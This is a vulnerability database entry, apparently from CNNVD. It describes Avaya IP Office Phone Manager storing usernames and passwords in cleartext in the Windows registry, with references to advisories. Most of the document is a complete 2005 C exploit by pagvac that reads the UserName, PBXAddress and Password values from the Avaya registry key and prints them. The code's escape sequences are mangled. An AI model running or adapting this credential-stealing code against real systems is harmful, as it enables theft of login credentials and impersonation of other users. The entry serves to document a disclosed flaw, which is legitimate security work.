https://www.exploit-db.com/exploits/839
https://www.securityfocus.com/bid/90226
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200503-108

AvayaIPOfficePhoneManager及IPSoftphone等其他产品将明文敏感数据存放在注册表键中，本地及可能的远程用户可以通过AvayaIP400Generic等键窃取用户名和密码，并假冒其他用户。

#include <windows.h>
#include <stdio.h>
#include <string.h>

/*
               Filename:               exploit.c
               Title:          Avaya IP Office Phone Manager - Cleartext Sensitive Data Vulnerability Exploit v0.01
               Author:         pagvac (Adrian Pastor)
               Date:                   24th Feb, 2005
               Other info:             tested on version 2.013. Compile as a Win32 console application project in Visual C++
*/

BOOL QueryVal(char lszVal2Query[255], char lszValData[255])
{
    char lszResult[255];
    HKEY hKey;
    LONG returnStatus;
    DWORD dwType=REG_SZ;
    DWORD dwSize=255;
    returnStatus = RegOpenKeyEx(HKEY_LOCAL_MACHINE, "SOFTWARE\AVAYA\IP400\GENERIC", 0L, KEY_READ, &hKey);

        if (returnStatus == ERROR_SUCCESS)
    {
                returnStatus = RegQueryValueEx(hKey, lszVal2Query, NULL, &dwType,(LPBYTE)&lszResult, &dwSize);
         if (returnStatus == ERROR_SUCCESS)
         {
                          strcpy(lszValData, lszResult);
         }
                 RegCloseKey(hKey);
                 return TRUE;
    }
        else
        {
                RegCloseKey(hKey);
                return FALSE;
    }
}

void main()
{
       char valData[255];

       printf("nAvaya IP Office Phone Manager - Cleartext Sensitive Data Vulnerability Exploitn");
       printf("By pagvac (Adrian Pastor)n");
       printf("Tested on version 2.013nn");

       // Print username
       printf("Username:t");
       if(!QueryVal("UserName", valData))
               printf("Error! No permissions to read key value?n");
       else
               printf("%sn", valData);

       // Print IP address
       printf("PBX IP Address:t");
       if(!QueryVal("PBXAddress", valData))
               printf("Error! No permissions to read key value?n");
       else
               printf("%sn", valData);

       // Print password
       printf("Password:t");
       if(!QueryVal("Password", valData))
               printf("Error! No permissions to read key value?n");
       else
       {

               if(strcmp(valData, "")==0)
                       printf("[blank password]nn");
               else
               {
                       printf("%sn", valData);
                       printf("Password obsfucated?nn");
               }
       }

}

// milw0rm.com [2005-02-24]

Avaya IP Softphone 0

来源:support.avaya.com
链接:http://support.avaya.com/elmodocs2/security/ASA-2005-041_Sensitive_Info_Leak.pdf
来源:BUGTRAQ
名称:20050222Re:AvayaIPOfficePhoneManager-SensitiveInformationCleartextVulnerability
链接:http://marc.theaimsgroup.com/?l=bugtraq&m;=110910486128709&w;=2
来源:BUGTRAQ
名称:20050222AvayaIPOfficePhoneManager-SensitiveInformationCleartext
链接:http://marc.theaimsgroup.com/?l=bugtraq&m;=110909733831694&w;=2